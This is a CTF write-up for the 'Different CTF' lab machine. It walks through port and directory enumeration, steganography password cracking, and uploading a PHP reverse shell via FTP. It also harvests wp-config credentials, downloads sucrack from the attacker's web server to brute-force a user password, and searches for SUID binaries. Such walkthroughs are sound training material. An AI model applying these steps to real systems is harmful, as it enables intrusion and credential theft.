Different CTF Writeup

5 min readAug 19, 2021

Hello everyone.Today i will explain how you can hack the “Different CTF” machine.Let’s start hack this machine.

nmap -sN -sV <ip>

With Nmap you can enumerate open ports.I tried login FTP as anonymous but it is not allow.Let’s check website.

This site is uses wordpress.Wordpress is need a domain for show the website more straight.I will add this ip address to /etc/hosts file.In this way i can enter site with this domain.If you look page source you can see domain.

Now look better.I want to scan hidden directories with gobuster.

gobuster dir -u http://ip/ -w <wordlist-path>

Let’s check <hidden> directory.

I downloaded this files with wget command.

wget http://ip/<hidden>/wordlist.txt
wget http://ip/<hidden>/austrailian-bulldog-ant.jpg

I think a hidden message inside the image.I tried open message with steghide but i need a password.I will try crack password with wordlist.txt.You can crack password with “Stegcracker”.

Stegcracker usage.

stegcracker <file> <wordlist>

I cracked password.I extracted file with steghide and i found base64 hash.

steghide — extract -sf austrailian-bulldog-ant.jpg

I found FTP username and password.

I can see web files.I think i can put a reverse shell and i can execute it from website.

You can download php reverse shell from Pentestmonkey’s Github page

I edit reverse shell file permissions with chmod(chmod 777=All users can execute,write and read).

Let’s execute shell from website.

Oh we got a problem.I think this website has got a subdomain and we put reverse shell inside subdomain.I want to check web files in FTP

I can see wp-config file.This file is database file and i want to read this file.

I found username and password.I can login phpMyAdmin panel with this username and password.

I want to check phpmyadmin1’s files

I found this under the “wp-options” header.Lets add subdomain to /etc/hosts file.

Let’s try again execute reverse shell from website.

I need more powerful shell.

python -c ‘import pty;pty.spawn(“/bin/bash”)’
export TERM=xterm
ctrl^z
stty raw -echo && fg
<enter>
stty <your rows and columns value>

Let’s find web flag.

Good Job!Now i must login hakanbey user for user flag.

I will use sucrack tool for crack hakanbey’s password(you can download here.).I think we should add 123*** to all lines of the wordlist file.Because FTP service password and İmage password contain 123***.

I created a Python file.When i execute this file it is add 123*** to all lines.

python <file-name>

I downloaded sucrack to my own machine and i created web server with python from my own machine.

python -m SimpleHTTPServer

I downloaded sucrack file to shell(download to /tmp folder because you dont need download as hakanbey user or root).

wget http://<ip>/<file-name>

Let’s install sucrack tool.

dpkg -x <filename> <foldername>

cd <foldername>/usr/bin
./sucrack -u hakanbey <wordlist>

(You can see help menu with “./sucrack -h”)

Now i can login hakanbey user.

I want to look suid bit

find / -perm -u=s -type f 2>/dev/null

I can see “/usr/bin/binary” this is strange.I will execute binary file with ltrace so file is running in ltrace .

When i execute this file in system and i enter true answer it will give me hint.txt and root.jpg.

It is telling “open image with hexeditor and look 00000020” and i can see “CyberChef” so i should decode hash.Again i created a web server with python and i downloaded root.jpg my own machine.